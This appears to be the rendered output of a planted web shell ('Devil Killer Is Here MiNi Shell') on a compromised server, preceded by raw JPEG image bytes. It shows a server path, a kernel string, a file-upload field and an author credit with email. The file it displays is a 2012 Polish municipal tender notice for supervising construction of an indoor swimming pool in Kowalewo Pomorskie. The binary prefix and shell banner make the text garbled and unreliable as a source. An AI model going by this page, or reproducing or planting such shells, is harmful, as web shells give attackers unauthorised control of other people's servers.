JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121010/391782-N-2012.html

<p class="kh_header"><b>Kowalewo Pomorskie: Pełnienie kompleksowego nadzoru inwestorskiego nad realizacją zadania pn. Budowa krytej pływalni w Kowalewie Pomorskim na działce nr ewid. 255, obręb 4,  położonej przy ul. Jana Pawła II w Kowalewie Pomorskim</b><br>
<b>Numer ogłoszenia: 391782 - 2012; data zamieszczenia: 10.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kowalewo Pomorskie , Plac  Wolności 1, 87-410 Kowalewo Pomorskie, woj. kujawsko-pomorskie, tel. 056 6841024, faks 056 6841071.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie kompleksowego nadzoru inwestorskiego nad realizacją zadania pn. Budowa krytej pływalni w Kowalewie Pomorskim na działce nr ewid. 255, obręb 4,  położonej przy ul. Jana Pawła II w Kowalewie Pomorskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest pełnienie kompleksowego nadzoru inwestorskiego nad realizacją zadania pn. Budowa krytej pływalni w Kowalewie Pomorskim na działce nr ewid. 255, obręb 4,  położonej przy ul. Jana Pawła II w Kowalewie Pomorskim w następującym zakresie:                

Zestawienie powierzchni obiektu:
           Powierzchnia zabudowy	  1.726,73 m2
           Powierzchnia całkowita budynku:	  3.268,99m2
Powierzchnia netto:	 3.061,75m2
Powierzchnia użytkowa podstawowa:	  1.526,4  9m2
      Powierzchnia użytkowa podst. piwnicy	      00,00m2 
      Powierzchnia użytkowa podst. parteru	  1.526,49m2
Powierzchnia usługowa:	  1.522,41m2
      Powierzchnia usługowa piwnicy	  1.459,66m2 
      Powierzchnia usługowa parteru	       62,85m2
Powierzchnia ruchu:	     193,08m2
      Powierzchnia ruchu piwnicy	       46,10m2 
      Powierzchnia ruchu parteru	     211,05 m2
Zestawienie kubatur
Objętość :	     13.640,00m3

Program hali basenowej: 
-  basen pływacki 6 torowy: 25x12,5m, gł:1,35-1,8m obciążenie użytk.: 4 os. x 6 torów =  24 osoby
-  basen dla osób niepływających : 12,5x8, gł:0,8m-1,10m obciążenie użytkowe: 25 osób
-  brodzik: 6x7m, gł: 0,15-0,50m obciążenie użytkowe:  10 osób
-  wanna z hydromasażem: śr: 2,83m, gł. 0,94m obciążenie użytkowe:  6 osób
Obiekt projektuje się wykonać w technologii tradycyjnej o konstrukcji szkieletowej słupowo-płytowej, wylewanej na mokro ze zbrojonego betonu oraz z wypełnieniami żelbetowymi oraz murowanymi z gazobetonu klasy 600 oraz zaizolowanych termicznie styropianem grubości 16cm, pokrytej tynkiem mineralnym. Ławy fundamentowe i fundamenty - żelbetowe. Projektowany budynek o wymiarach około 42,74x46,80m. będzie się składał z następujących części: hall główny, kryta pływania oraz zaplecze sanitarno-socjalne. Ściany zewnętrzne i wewnętrzne parteru zaprojektowano jako ścianę dwuwarstwową murowaną z bloczków z gazobetonu marki 600 grubości 24cm. Strop między kondygnacyjny oraz stropodach projektuje się wykonać jako żelbetowy monolityczny o grubościach 15, 20cm. Konstrukcja dachu składa się z sześciu dźwigarów z drewna klejonego o wymiarach 20x116÷221cm i maksymalnej rozpiętości przęsła 19,67m w rozstawie co 6,25m oraz płatwi z drewna klejonego o przekroju 16x32cm w rozstawie co 1,2m.

Instalacje wod - kan, c.o., went., gaz,
Przedmiotem zamówienia jest budowa zewnętrznych instalacji wod. - kan na terenie działki objętej opracowaniem dla nowoprojektowanego budynku pływalni w Kowalewie Pomorskim.
Zakres rzeczowy objęty postępowaniem przetargowym obejmuje wykonanie:
Sieci wodociągowej o długości przewodów wodociągowych L=310mb.
Przyłącza kanalizacji sanitarnej L= 77mb z włączeniem do istniejącej studni na kanale sanitarnym w ul. Jana Pawła II.  
Sieci kanalizacji deszczowej o łącznej długości L=209mb
Kotłowni gazowej z pompą ciepła.
Instalacji c.o.
Instalacji ciepła technologicznego.
Instalacji ciepła technologicznego dla wody basenowej.
Instalacji odzysku ciepła ze ścieków.
Instalacji gazu opałowego zasilać będzie w gaz ziemny wysokometanowy grupy E kotłownię gazową
Wentylacja mechaniczna
Instalacje elektryczne
Zasilanie energetyczne nastąpi ze Złącza kablowego zintegrowanego, zlokalizowanego na budynku. Roboty wykonywane będą w następującym zakresie:
Instalacja odgromowa
Rozdzielnia główna
Instalacja połączeń wyrównawczych
Instalacje odbiorcze oświetlenia i gniazd wtyczkowych
Instalacje oświetlenia awaryjnego i ewakuacyjnego
Oświetlenie zewnętrzne
Ochrona od porażeń prądem elektrycznym
Instalacja teletechniczna
Instalacja niskoprądowa
           Zakres opracowania obejmuje wykonanie systemu automatycznej sygnalizacji pożaru.
System telewizji dozorowej CCTV.
           System telewizji dozorowej obejmuje swym zasięgiem zewnętrzne i wewnętrzne strefy obiektu. Zewnątrz - jest 
           to teren przyległy do budynku ze szczególnym uwzględnieniem wejść, na?tomiast wewnątrz - ciągi 
           komunikacyjne oraz basen i brodziki. 
Nagłośnienie PA
           System nagłośnienia w Hali Basenu i brodzików o wysokiej impedancji na bazie instalacji o napięciu linii
           głośnikowych 100V.  
System sygnalizacji włamania i napadu  SSWiN 
           Dokumentacja obejmuje instalację centralki sygnalizacji włamania wraz z osprzętem, instalację różnego rodzaju 
            i typu czujek, wykonanie okablowania urządzeń oraz instalację wszystkich pozostałych urządzeń niezbędnych 
           do poprawnego działania całego systemu. Zakłada się, że  ochroną zostaną objęte wszystkie pomieszczenia 
           budynku, w których znajdują się: wejścia zewnętrzne, komunikacje, wszystkie pomieszcze?nia posiadające 
           otwory okienne oraz magazynki techniczne, 
Instalacja zegarowa.
Elektroniczny system obsługi klienta  ESOK
Technologia basenu
Opracowanie obejmuje technologie uzdatniania wody basenowej dla Krytej Pływalni w Kowalewie Pomorskim przy ul. Jana Pawła II. Część basenowa składa sie z basenu pływackiego, basenu dla niepływających z 
atrakcjami, brodzika dla dzieci oraz wanny z masażami. Basen dla niepływających wyposażono w oświetlenie podwodne oraz w atrakcje wodne i powietrzne, brodzik dla dzieci w atrakcje wodne, wanna wyposażona jest w masaże wodne i powietrzne, a w basenie pływackim zaprojektowano oświetlenie. Technologie uzdatniania wody basenowej zaprojektowano na filtrach ciśnieniowych ze złożem piaskowym. Niecki basenowe zaprojektowano jako betonowe, wannę zaprojektowano jako prefabrykat tworzywowy.

Wyposażenie obiektu-Zgodnie z opracowanymi wykazami stanowiącymi załączniki do Projektu budowlanego.

2.  Zakres prac objętych zamówieniem obejmuje:
     1) reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej 
          realizacji z dokumentacją projektową, specyfikacją techniczną wykonania i odbioru robót   
          budowlanych i pozwoleniem na wykonanie robót budowlanych, przepisami i 
          obowiązującymi normami oraz zasadami wiedzy technicznej,                                
     2) sprawdzanie jakości wykonanych robót, wbudowanych wyrobów budowlanych, a w 
          szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i 
          niedopuszczonych do obrotu i stosowania w budownictwie,
     3) sprawdzenie i odbiór robót budowlanych ulegających zakryciu lub zanikających w terminie 3 
         dni roboczych od daty zgłoszenia przez Wykonawcę robót, uczestniczenie w próbach i 
         odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych oraz 
         przygotowanie i udział w czynnościach odbioru gotowych elementów obiektu oraz odbioru 
         końcowego, 
     4) potwierdzanie faktycznie wykonanych robót oraz usunięcia ewentualnych wad, a także 
         kontrolowanie rozliczeń budowy, monitorowanie postępu prac poprzez porównywanie 
          postępu faktycznego z przyjętym harmonogramem robót, odbiorów i płatności, 
     5) uzgadnianie dokonania koniecznych zmian z autorami projektu w ramach nadzoru
         autorskiego,
     6) weryfikacja obmiarów robót, kosztorysów powykonawczych, zamiennych i ewentualnych
         dodatkowych pod względem merytorycznym i rachunkowym oraz zatwierdzanie protokołów 
         odbioru robót, protokołów robót zamiennych czy protokołów konieczności w uzgodnieniu z 
         Zamawiającym,
     7) koordynacja czynności ustanowionych na budowie inspektorów nadzoru inwestorskiego w 
         różnych branżach (koordynatorem wszystkich branż będzie inspektor nadzoru inwestorskiego  
         z branży konstrukcyjno - budowlanej),
     8) zapewnienie codziennej dyspozycyjności nadzoru na terenie budowy w godzinach pracy 
         Wykonawcy robót,
     9) rozwiązywanie problemów i sporów powstałych w trakcie realizacji robót,
     10) informowanie na piśmie Zamawiającego o wszystkich faktach mających znaczenie dla 
        realizacji inwestycji, a zwłaszcza o wszystkich zagrożeniach terminu zakończenia robót,
     11) sporządzanie okresowych sprawozdań z przebiegu realizacji inwestycji i przedstawienie ich 
         Zamawiającemu w terminie wzajemnie uzgodnionym,
     12) obsługa okresu gwarancyjnego inwestycji ( 4 lata ).
     13) uczestnictwo w przekazaniu terenu budowy Wykonawcy robót,
     14) potwierdzenie wpisem w dzienniku budowy osiągnięcia gotowości do odbioru,
     15) wydawanie kierownikowi budowy poleceń potwierdzonych wpisami do dziennika budowy, 
        dotyczącymi: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także 
        wymagających odkrycia robót lub elementów zakrytych, oraz przedstawienia ekspertyz 
        dotyczących prowadzonych robót budowlanych i dowodów dopuszczenia do stosowania w 
        budownictwie wyrobów budowlanych i urządzeń technicznych,
     16) egzekwowanie od wykonawcy robót przedstawiania, na każde żądanie Zamawiającego, 
         dokumentów, dowodów dopuszczenia do stosowania materiałów i wyrobów budowlanych,
     17) żądania od kierownika budowy dokonania poprawek bądź ponownego wykonania wadliwie 
         wykonanych robót,
     18) żądanie od kierownika budowy wstrzymania dalszych robót budowlanych w przypadku, 
        gdyby ich kontynuacja mogła wywołać zagrożenie bezpieczeństwa i ochrony zdrowia lub 
        spowodowała niedopuszczalną niezgodność z dokumentacją projektową, specyfikacją 
        techniczną wykonani i odbioru robót budowlanych, decyzją o pozwoleniu na wykonanie robót 
        budowlanych, przepisami, normami oraz zasadami wiedzy technicznej,
     19) przeprowadzenie analizy i oceny dotyczącej proponowanych przez Wykonawcę robót 
        sposobów rozwiązywania powstałych problemów oraz przewidywanych zagrożeń,
     20) uczestniczenie w organizowanych przez Zamawiającego systematycznych naradach 
         koordynacyjnych oraz w naradach wynikających z bieżących potrzeb,
     21) rozliczenie umowy o roboty budowlane w przypadku jej rozwiązania,
     22) dostarczenie Zamawiającemu dokumentacji i informacji w terminach przez niego ustalonych 
           w przypadku sporów sądowych i innych, wynikających z realizacji inwestycji,
     23) weryfikacja i odbiór od Wykonawcy RBM całej dokumentacji budowy i dokumentacji 
           powykonawczej, wszelkich dokumentów i oświadczeń właściwych do eksploatacji obiektu, 
           kompletowanie ich, a po zakończeniu inwestycji protokolarne przekazanie użytkownikowi, 
     24) dokonanie zatwierdzenia zmian dokumentacji powykonawczej oraz podpisanie oświadczenia 
          kierownika budowy o zakończeniu robót,
     25) uczestniczenie w przeglądach gwarancyjnych,
     26) uczestniczenie w odbiorze usuniętych usterek, wad ujawnionych w trakcie odbioru 
         końcowego     i przeglądach gwarancyjnych,
     27) prowadzenie nadzoru inwestorskiego, w przypadku wystąpienia robót dodatkowych, 
         zamiennych, bez żądania dodatkowego wynagrodzenia,
     28) bezwzględne żądanie od Wykonawcy robót dołączenia do protokołu odbioru robót 
          budowlanych, stanowiącego załącznik do faktury deklaracji zgodności, certyfikatów na 
          zastosowane materiały, dowodów dopuszczenia do stosowania w budownictwie wyrobów 
          budowlanych i urządzeń technicznych występujących w tych protokołach.
      3. Liczba wizyt inspektora nadzoru inwestorskiego na budowie lub udział w komisjach i    
          spotkaniach w ramach pełnienia obowiązków inspektora nadzoru inwestorskiego powinna 
          zapewnić prawidłowy nadzór i nie powodować zastojów na budowie oraz odbywać się będzie na 
          wezwanie kierownika budowy lub zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 6 000,00 PLN ( słownie: sześć tysięcy złotych ).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że zrealizował min. 1 usługę, polegającą na pełnieniu nadzoru inwestorskiego nad budową basenu krytego lub pływalni krytej  z łącznikiem lub wolnostojącego o  kubaturze min. 13 000 m3 w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia wraz z załączeniem dokumentów ( referencji ) potwierdzających, że usługa została wykonane zgodnie z zasadami sztuki budowlanej, prawidłowo ukończona i rozliczona.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że zapewni osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za nadzorowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami w następujących specjalnościach/branżach:
a) konstrukcyjno-budowlanej bez ograniczeń ( kierownik zespołu inspektorów nadzoru ),
b) sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń,
c) sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń,
d) drogowej bez ograniczeń
(w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. warunek może być spełniony łącznie).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wypełniony formularz ofertowy ( wg zał. Nr 6 )
b) dowód wniesienia wadium,
c) w przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o zamówienie -pełnomocnictwo do reprezentowania wykonawców w niniejszym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
d) pełnomocnictwo udzielone osobom podpisującym dokumenty ofertowe, o ile prawo  do reprezentowania wykonawcy w powyższym zakresie nie wynika wprost z dokumentów rejestrowych,
e) pisemne zobowiązanie podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na   okres korzystania z nich przy wykonywaniu zamówienia, jeżeli wykonawca polega na wiedzy i  doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub  zdolności finansowej innych podmiotów ,niezależnie od charakteru prawnego łączących go z nimi  stosunków,
f) jeżeli wykonawca wykazując spełnienie warunków o których mowa w pkt. V polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentu wymienionego w pkt VI. 2.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony mogą zmienić postanowienia zawartej umowy:
    1) w zakresie terminu jeżeli termin realizacji robot budowlanych ulegnie zmianie z następujących
         przyczyn:
         a)    wystąpiły roboty dodatkowe nieprzewidziane i nie objęte zamówieniem podstawowym,    
                których nie można było przewidzieć, a warunkują wykonanie i dalszą realizację
                zamówienia podstawowego.
b)   niezbędne będzie wprowadzenie zmian w dokumentacji projektowej,
c)    wystąpią opóźnienia w przekazaniu terenu budowy Wykonawcy robót budowlanych,
d)    zaistniały przyczyny niezależne od działania Stron, których przy zachowaniu należytej
       staranności nie można uniknąć ani zapobiec np warunki pogodowe utrudniające realizację
       robót,
     2) w zakresie wymienionych w umowie inspektorów nadzoru inwestorskiego w poszczególnych
          branżach - jeżeli wystąpi konieczność ich zmiany wynikająca ze zdarzeń losowych.
     3) wszelkie zmiany korzystne dla zamawiającego, które nie prowadzą do zmiany treści oferty na
          podstawie której została zawarta niniejsza umowa,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kowalewopomorskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kowalewie Pomorskim, ul. Św. Mikołaja 5, 87-410 Kowalewo Pomorskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2012 godzina 12:00, miejsce: Urząd Miejski w  Kowalewie Pomorskimi, Plac Wolności 1, 87-410 Kowalewo Pomorskie, Sekretariat ( pokój nr 2 ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> RPO Województwa Kujawsko-Pomorskiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com